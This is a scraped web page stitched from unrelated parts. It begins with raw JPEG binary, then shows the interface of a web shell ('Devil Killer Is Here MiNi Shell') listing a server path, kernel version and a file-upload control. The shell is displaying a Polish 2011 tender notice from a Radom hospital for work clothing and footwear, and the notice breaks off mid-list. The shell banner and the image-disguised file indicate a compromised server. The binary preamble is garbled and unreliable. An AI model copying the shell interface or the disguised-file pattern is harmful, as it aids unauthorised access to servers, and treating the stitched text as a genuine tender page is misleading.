JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110131/14816-N-2011.html

<p class="kh_header"><b>Radom: Zakup i dostawa odzieży oraz obuwia roboczego i ochronnego dla potrzeb Radomskiego Szpitala Specjalistycznego</b><br>
<b>Numer ogłoszenia: 14816 - 2011; data zamieszczenia: 31.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa odzieży oraz obuwia roboczego i ochronnego dla potrzeb Radomskiego Szpitala Specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część nr 1 - Odzież i obuwie robocze, odzież ochronna, ręczniki
LP.	Rodzaj artykułu	Ilość na 12 miesięcy
1.	Ubrania robocze drelichowe:
a) dwa kolory: niebieski (29 klp.) i zielony (15 kpl.); 
b) spodnie:
na szelkach typu ogrodniczki, 
4 kieszenie, 
pasek z gumkami na bokach, 
rozporek na suwak, 
nogawki proste;
c) bluza:
-	rozpinana, 
-	rękaw z mankietem, 
-	długość do biodra, 
-	pasek z gumkami po bokach, 
-	kieszeń na piersi i dwie boczne,
-	logo RSzS na górnej kieszeni;
d) tkanina 60% poliester, 40% bawełna;
e) gramatura tkaniny od 280 do 330 g/m2;
f) kurczliwość do 3%;
g) w rozmiarach 42-56, wzrost 166 - 188;	44 kpl.
2.	Ubrania monterskie:
a) kolor grafit; 
b) spodnie:
-	na szelkach typu ogrodniczki, 
-	6 kieszeni, 
-	pasek z gumkami na bokach, 
-	rozporek na suwak, 
-	nogawki proste; 
c) bluza:
-	rozpinana, 
-	rękaw z mankietem, 
-	długość do biodra, 
-	pasek z gumkami po bokach, 
-	kieszeń na piersi i dwie boczne; 
d) gramatura tkaniny  280-300 g/m2;
e) kurczliwość do 3%.
f) w rozmiarach 42-56, wzrost 170 - 178;	4 kpl.
3.	Koszula flanelowa:
a) w ciemnym kolorze; 
b) gramatura od 180 do 200 g/m2;
c) kurczliwość do 3%;
d) w rozmiarach 42-56, wzrost 166 - 188;	38 szt.
4.	Czapka drelichowa:
a) dwa kolory - zielony (11 szt.) i niebieski drelich (29 szt.);
b) z przodu z daszkiem z wkładką usztywniającą;
c) tył z regulowanym zapięciem; 
d) gramatura tkaniny od 220 do 240  g/m2 ; 
e) kurczliwość do 3%;	40 szt.
5.	Trzewiki robocze - męskie:
a) obuwie skórzane, skóra barwiona na czarno; 
b) spody z tworzywa antypoślizgowego; 
c) wzmacniane noski; 
d) w rozmiarach od 40-46;	44 par
6.	Gumofilce:
a) kolor czarny; 
b) materiał guma, filc; 
c) spody antypoślizgowe; 
d) w rozmiarach od 40-46;	8 par
7.	Kurtka ocieplana damska z odpinanym ocieplaczem
a) tkanina wodoodporna 60 % poliester, 40 % bawełna, (+/- 10 %);
b) kolor granat lub szary ;
c) długość do 1/3 uda; 
d) kaptur dopinany na suwak; 
e) zapinana na suwak; 
f) dwie kieszenie; 
g) mankiet ze ściągaczem;
h) w rozmiarach od 42-56, wzrost 170- 188;	46 szt.
8.	Kurtka ocieplana męska 
a) tkanina  60% poliester, 40% bawełna, (+/- 10 %);
b) kolor popielato-czarny; 
c) długość do 1/3 uda; 
d) kaptur dopinany na suwak; 
e) rękaw ze ściągaczem na gumce; 
f) zapinana na suwak;
g) rozmiarach od 42-56, wzrost 166- 188;	35 szt.
9.	Bezrękawnik ocieplany damski:
a)tkanina 60% poliester, 40 % bawełna ;
b)kolor beżowy;
c) kołnierz typu stójka;
d) dół kamizelki ściągany stoperami;
e) podszewka pikowana wykonana z poliamidu;
f) dwie kieszenie;
g) zapinana na zamek błyskawiczny;
h) rozmiarach od 42-56, wzrost 170- 188;	5 szt.
10.	Kurtka p/deszczowa:
a) tkanina wodoodporna; 
b) kolory; granat  (9szt.) i  czerwony (1 szt.);
c) długość przed kolano; 
d) kaptur dopinany na suwak;
e) zapinana na suwak;
f) dwie kieszenie boczne; 
g) w rozmiarach: damska -36/160 (1szt.), męskie- 42-56, wzrost 166- 188 (9szt.);	10 szt.
11.	Ręczniki:
a) kolory ciemne; 
b) 100 % bawełna; 
c) rozmiar 65 x 130;	45 szt.
	Dotyczy poz. 1, 2, 3, 7, 8, 9, 10, 11 - Zamawiający wymaga UMIESZCZENIE LOGA do n/w przedmiotu zamówienia:

Wzór loga:







poz. 1:
spodnie - logo ma się znajdować na przedniej kieszeni z lewej strony, ma być widoczne, kolor - dla ubrań zielonych - niebieskie, dla ubrań niebieskich - inny odcień niebieskiego niż kolor ubrania
bluza - logo ma się znajdować z przodu na kieszeni na piersi, ma być widoczne, kolor - niebieski
poz. 2:
spodnie - logo  ma się znajdować na przedniej kieszeni z lewej strony, ma być widoczne, kolor - niebieski
bluza - logo   ma się znajdować z przodu na kieszeni na piersi, ma być widoczne, kolor - niebieski
poz. 3, 7, 8, 9, 10:
logo ma się znajdować z przodu na wysokości piersi po lewej stronie, ma być widoczne, kolor - niebieski
poz. 11:
logo  ma się znajdować w jednym rogu ręcznika, ma być widoczne, kolor - niebieski

dotyczy pozycji powyżej: logo na się znajdować na białym tle; ma być naszyte lub wyhaftowane lub wtkane lub inne
	
Warunki pakowania towaru:
Poz. 1, 2, 3, 4, 8, 10 - towar pakowany zestawami lub pojedynczo z imiennym oznaczeniem użytkownika według załącznika do umowy. Zestaw I i II w opakowaniu zbiorczym dla Działu Technicznego i Działu Administracyjno-Gospodarczego. Wykaz towaru (spis zestawów, rozmiarów, ilości) zostanie załączony Wykonawcy do umowy.
Poz. 5, 6, 7, 9, 11 - każda pozycja w oddzielnym opakowaniu według załącznika do umowy

Część nr 2 - Obuwie profilaktyczne
LP.	Rodzaj artykułu	Ilość na 12 miesięcy
1.	Obuwie profilaktyczne damskie - klapki:
a) obuwie skórzane na koturnie, skóra barwiona na biało;
b) palce odkryte; 
c) spody z tworzywa antypoślizgowego; 
d) z profilem ortopedycznym; 
e) wewnętrzna skórzana wkładka; 
f) możliwość regulacji tęgości; 
g)w rozmiarach od 35- 43;	1150 par
2.	Obuwie profilaktyczne męskie palce kryte:
a) obuwie skórzane, skóra barwiona na biało - dziurkowana; 
b) palce kryte; 
c) spody z tworzywa antypoślizgowego;
d) pasek z regulacją na pięcie; 
e) ergonomiczne wkładki; 
f) wewnętrzna skórzana wkładka;
g) w rozmiarach od 39- 46;	160 par
3.	Obuwie damskie dla pracowników kuchni: 
a) palce kryte; 
b) podeszwy antypoślizgowego; 
c) biały kolor obuwia; 
d) możliwość prania w temperaturze 40° C;
e) zapobieganie rozwoju drobnoustrojów i grzybów w obuwiu;
f) w rozmiarach od 35- 44;
g) muszą spełniać wymagania systemu HACCP;	28 par
4.	Drewniaki męskie:
a) pokrycie skórzane, skóra barwiona na biało; 
b) spody wyprofilowane, drewniane, antypoślizgowe; 
c) w rozmiarach od 39- 46;	2 par
Warunki pakowania towaru:
Towar pakowany z podziałem na obuwie damskie i męskie. W opakowaniu rozmiar i ilość zgodnie z załącznikiem do umowy.

Część nr 3 - Obuwie operacyjne
LP.	Rodzaj artykułu	Ilość na 12 miesięcy
1.	Obuwie operacyjne:
a) kolor  zielony; 
b) z możliwością sterylizacji w autoklawach w temperaturze do 135° C i prania w temperaturze  90° C; 
c) o własnościach antystatycznych; 
d) podeszwy antypoślizgowe i absorbujące energię w okolicy piętowej,
anatomicznie dostosowane do stopy; 
e) po bokach otwory wentylacyjne; 
f) w rozmiarze od 35- 46;	30par
Warunki pakowania towaru:
 W jednym opakowaniu rozmiar i ilość zgodnie z załącznikiem do umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 18.13.00.00-0, 18.41.00.00-6, 18.81.20.00-4, 39.51.41.00-9, 18.83.20.00-0, 18.83.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem udziału w postępowaniu jest wniesienie Wadium.
2.	Zamawiający określa wadium w wysokości: 
-	dla Części nr 1 -    500,00 zł (słownie: pięćset złotych)
-	dla Części nr 2 - 1 100,00 zł (słownie: jeden tysiąc sto złotych)
-	dla Części nr 3 -      50,00 zł (słownie: pięćdziesiąt złotych)
Wadium nalezy wnieść do dnia 2011.02.09 do godz. 10:00.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykonał 
w ostatnich trzech latach przed dniem wszczęcia postępowania, a jeżeli okres działalności jest krótszy w tym okresie  dostawy oferowanego towaru  na kwotę min: 
a)	dla Części nr 1 -     9 000,00 zł 
b)	dla Części nr 2 -   22 000,00 zł
c)	dla Części nr 3 -     1 000,00 zł
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Pełnomocnictwo do reprezentowania jeżeli ofertę składa pełnomocnik.
2.	Dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Cena  jednostkowa  brutto może  ulec  zmianie w  przypadku  zmiany  stawki  podatku VAT wprowadzonej przepisami prawa - mogą się zmienić od dnia wejścia w życie danego aktu  prawnego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> RADOMSKI  SZPITAL  SPECJALISTYCZNY
ul. Lekarska 4, 26-610 Radom, 
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
pok. 316 III piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2011 godzina 10:00, miejsce: RADOMSKI  SZPITAL  SPECJALISTYCZNY
ul. Lekarska 4, 26-610 Radom, 
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
pok. 316 III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Odzież i obuwie robocze, odzież ochronna, ręczniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Rodzaj artykułu	Ilość na 12 miesięcy
1.	Ubrania robocze drelichowe:
a) dwa kolory: niebieski (29 klp.) i zielony (15 kpl.); 
b) spodnie:
na szelkach typu ogrodniczki, 
4 kieszenie, 
pasek z gumkami na bokach, 
rozporek na suwak, 
nogawki proste;
c) bluza:
-	rozpinana, 
-	rękaw z mankietem, 
-	długość do biodra, 
-	pasek z gumkami po bokach, 
-	kieszeń na piersi i dwie boczne,
-	logo RSzS na górnej kieszeni;
d) tkanina 60% poliester, 40% bawełna;
e) gramatura tkaniny od 280 do 330 g/m2;
f) kurczliwość do 3%;
g) w rozmiarach 42-56, wzrost 166 - 188;	44 kpl.
2.	Ubrania monterskie:
a) kolor grafit; 
b) spodnie:
-	na szelkach typu ogrodniczki, 
-	6 kieszeni, 
-	pasek z gumkami na bokach, 
-	rozporek na suwak, 
-	nogawki proste; 
c) bluza:
-	rozpinana, 
-	rękaw z mankietem, 
-	długość do biodra, 
-	pasek z gumkami po bokach, 
-	kieszeń na piersi i dwie boczne; 
d) gramatura tkaniny  280-300 g/m2;
e) kurczliwość do 3%.
f) w rozmiarach 42-56, wzrost 170 - 178;	4 kpl.
3.	Koszula flanelowa:
a) w ciemnym kolorze; 
b) gramatura od 180 do 200 g/m2;
c) kurczliwość do 3%;
d) w rozmiarach 42-56, wzrost 166 - 188;	38 szt.
4.	Czapka drelichowa:
a) dwa kolory - zielony (11 szt.) i niebieski drelich (29 szt.);
b) z przodu z daszkiem z wkładką usztywniającą;
c) tył z regulowanym zapięciem; 
d) gramatura tkaniny od 220 do 240  g/m2 ; 
e) kurczliwość do 3%;	40 szt.
5.	Trzewiki robocze - męskie:
a) obuwie skórzane, skóra barwiona na czarno; 
b) spody z tworzywa antypoślizgowego; 
c) wzmacniane noski; 
d) w rozmiarach od 40-46;	44 par
6.	Gumofilce:
a) kolor czarny; 
b) materiał guma, filc; 
c) spody antypoślizgowe; 
d) w rozmiarach od 40-46;	8 par
7.	Kurtka ocieplana damska z odpinanym ocieplaczem
a) tkanina wodoodporna 60 % poliester, 40 % bawełna, (+/- 10 %);
b) kolor granat lub szary ;
c) długość do 1/3 uda; 
d) kaptur dopinany na suwak; 
e) zapinana na suwak; 
f) dwie kieszenie; 
g) mankiet ze ściągaczem;
h) w rozmiarach od 42-56, wzrost 170- 188;	46 szt.
8.	Kurtka ocieplana męska 
a) tkanina  60% poliester, 40% bawełna, (+/- 10 %);
b) kolor popielato-czarny; 
c) długość do 1/3 uda; 
d) kaptur dopinany na suwak; 
e) rękaw ze ściągaczem na gumce; 
f) zapinana na suwak;
g) rozmiarach od 42-56, wzrost 166- 188;	35 szt.
9.	Bezrękawnik ocieplany damski:
a)tkanina 60% poliester, 40 % bawełna ;
b)kolor beżowy;
c) kołnierz typu stójka;
d) dół kamizelki ściągany stoperami;
e) podszewka pikowana wykonana z poliamidu;
f) dwie kieszenie;
g) zapinana na zamek błyskawiczny;
h) rozmiarach od 42-56, wzrost 170- 188;	5 szt.
10.	Kurtka p/deszczowa:
a) tkanina wodoodporna; 
b) kolory; granat  (9szt.) i  czerwony (1 szt.);
c) długość przed kolano; 
d) kaptur dopinany na suwak;
e) zapinana na suwak;
f) dwie kieszenie boczne; 
g) w rozmiarach: damska -36/160 (1szt.), męskie- 42-56, wzrost 166- 188 (9szt.);	10 szt.
11.	Ręczniki:
a) kolory ciemne; 
b) 100 % bawełna; 
c) rozmiar 65 x 130;	45 szt.
	Dotyczy poz. 1, 2, 3, 7, 8, 9, 10, 11 - Zamawiający wymaga UMIESZCZENIE LOGA do n/w przedmiotu zamówienia:

Wzór loga:







poz. 1:
spodnie - logo ma się znajdować na przedniej kieszeni z lewej strony, ma być widoczne, kolor - dla ubrań zielonych - niebieskie, dla ubrań niebieskich - inny odcień niebieskiego niż kolor ubrania
bluza - logo ma się znajdować z przodu na kieszeni na piersi, ma być widoczne, kolor - niebieski
poz. 2:
spodnie - logo  ma się znajdować na przedniej kieszeni z lewej strony, ma być widoczne, kolor - niebieski
bluza - logo   ma się znajdować z przodu na kieszeni na piersi, ma być widoczne, kolor - niebieski
poz. 3, 7, 8, 9, 10:
logo ma się znajdować z przodu na wysokości piersi po lewej stronie, ma być widoczne, kolor - niebieski
poz. 11:
logo  ma się znajdować w jednym rogu ręcznika, ma być widoczne, kolor - niebieski

dotyczy pozycji powyżej: logo na się znajdować na białym tle; ma być naszyte lub wyhaftowane lub wtkane lub inne
	
Warunki pakowania towaru:
Poz. 1, 2, 3, 4, 8, 10 - towar pakowany zestawami lub pojedynczo z imiennym oznaczeniem użytkownika według załącznika do umowy. Zestaw I i II w opakowaniu zbiorczym dla Działu Technicznego i Działu Administracyjno-Gospodarczego. Wykaz towaru (spis zestawów, rozmiarów, ilości) zostanie załączony Wykonawcy do umowy.
Poz. 5, 6, 7, 9, 11 - każda pozycja w oddzielnym opakowaniu według załącznika do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 18.13.00.00-0, 18.41.00.00-6, 18.81.20.00-4, 39.51.41.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Obuwie profilaktyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Rodzaj artykułu	Ilość na 12 miesięcy
1.	Obuwie profilaktyczne damskie - klapki:
a) obuwie skórzane na koturnie, skóra barwiona na biało;
b) palce odkryte; 
c) spody z tworzywa antypoślizgowego; 
